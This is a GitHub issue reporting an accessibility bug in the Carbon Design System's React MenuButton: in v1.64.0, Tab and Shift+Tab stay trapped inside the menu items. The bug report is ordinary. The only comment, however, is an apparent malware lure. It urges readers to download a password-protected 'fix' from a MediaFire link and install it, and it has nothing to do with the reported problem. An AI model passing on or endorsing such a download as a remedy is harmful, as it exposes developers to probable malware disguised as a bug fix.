### ISSUE TITLE
[a11y][MenuButton]: Focus Trapped Within MenuItem List in MenuButton Component

### ISSUE THREAD

**Issue by 2nikhiltom** [carbon-design-system/carbon#17277]
### Package

@carbon/react

### Package version

v1.64.0

### React version

18.02

### Automated testing tool and ruleset

Manual QA

### Description

 When navigating to the [MenuButton Default Story](https://react.carbondesignsystem.com/?path=/story/components-menubutton--default) via keyboard, and the MenuButton is activated, the focus is trapped within the list of MenuItems. 

After opening the list, the focus moves to the first MenuItem as expected. However, pressing the Tab or Shift+Tab keys does not move the focus out of the MenuItem list. The focus remains trapped within the MenuItem list, preventing users from navigating to other elements on the page.

I tested and it worked fine on V1.60.0 :[stackblitz]( https://stackblitz.com/edit/github-yzyrus-v2bvzg?file=src%2FApp.jsx,package.json)

### Reproduction/example

https://react.carbondesignsystem.com/?path=/story/components-menubutton--default

### Steps to reproduce

https://react.carbondesignsystem.com/?path=/story/components-menubutton--default

### Suggested Severity

Severity 2 = User cannot complete task, and/or no workaround within the user experience of a given component.

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://github.com/carbon-design-system/carbon/blob/f555616971a03fd454c0f4daea184adf41fff05b/.github/CODE_OF_CONDUCT.md)
- [X] I checked the [current issues](https://github.com/carbon-design-system/carbon/issues) for duplicate problems

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
